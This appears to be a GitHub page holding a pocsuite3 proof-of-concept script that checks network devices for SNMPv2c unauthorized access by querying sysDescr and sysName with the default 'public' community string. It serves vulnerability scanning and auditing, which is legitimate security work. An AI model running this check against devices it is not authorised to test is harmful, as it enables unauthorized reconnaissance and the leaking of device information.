forked from hanc00l/some_pocsuite
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathsnmp_v2_unauthorized.py
93 lines (84 loc) · 3.12 KB
/
snmp_v2_unauthorized.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
#!/usr/bin/env python
# coding: utf-8
from pysnmp.hlapi import getCmd, SnmpEngine, CommunityData, UdpTransportTarget, ContextData, ObjectType, ObjectIdentity
from urllib.parse import urlparse
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase
from pocsuite3.api import POC_CATEGORY, VUL_TYPE
class TestPOC(POCBase):
vulID = '0'
version = '1.0'
author = 'hancool'
vulDate = '2019-1-8'
createDate = '2019-1-8'
updateDate = '2019-1-8'
references = ['', ]
name = 'SNMP unauthorized access'
appPowerLink = ''
appName = 'All'
appVersion = 'v2'
vulType = VUL_TYPE.UNAUTHORIZED_ACCESS
category = POC_CATEGORY.EXPLOITS.REMOTE
install_requires = ['pysnmp']
desc = '''
SNMP Community默认设置,攻击者可通过该漏洞泄露网络设备的敏感信息。
'''
def _verify(self):
def test_snmp(target, port=161, community='public'):
try:
errorIndication, errorStatus, errorIndex, varBinds = next(
getCmd(SnmpEngine(),
# mpModel -> 0:v1,1:v2c
CommunityData(community, mpModel=1),
UdpTransportTarget(
(target, int(port)), timeout=1, retries=1),
ContextData(),
ObjectType(ObjectIdentity(
'SNMPv2-MIB', 'sysDescr', 0)),
ObjectType(ObjectIdentity('SNMPv2-MIB', 'sysName', 0)))
)
if errorIndication:
return (False, errorIndication)
elif errorStatus:
msg = '%s at %s' % (errorStatus.prettyPrint(
), errorIndex and varBinds[int(errorIndex) - 1][0] or '?')
return (False, msg)
else:
result = []
for varBind in varBinds:
result.append(' = '.join(
[x.prettyPrint() for x in varBind]))
return (True, result)
except Exception as e:
# raise
return (False, str(e))
result = {}
pr = urlparse(self.url)
if pr.port: # and pr.port not in ports:
ports = [pr.port]
else:
ports = [161]
for port in ports:
try:
status, msg = test_snmp(pr.hostname, port)
if status:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = '{}:{}'.format(
pr.hostname, port)
result['extra'] = {}
result['extra']['evidence'] = msg
break
except:
# raise
pass
return self.parse_output(result)
def _attack(self):
return self._verify()
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('not vulnerability')
return output
register_poc(TestPOC)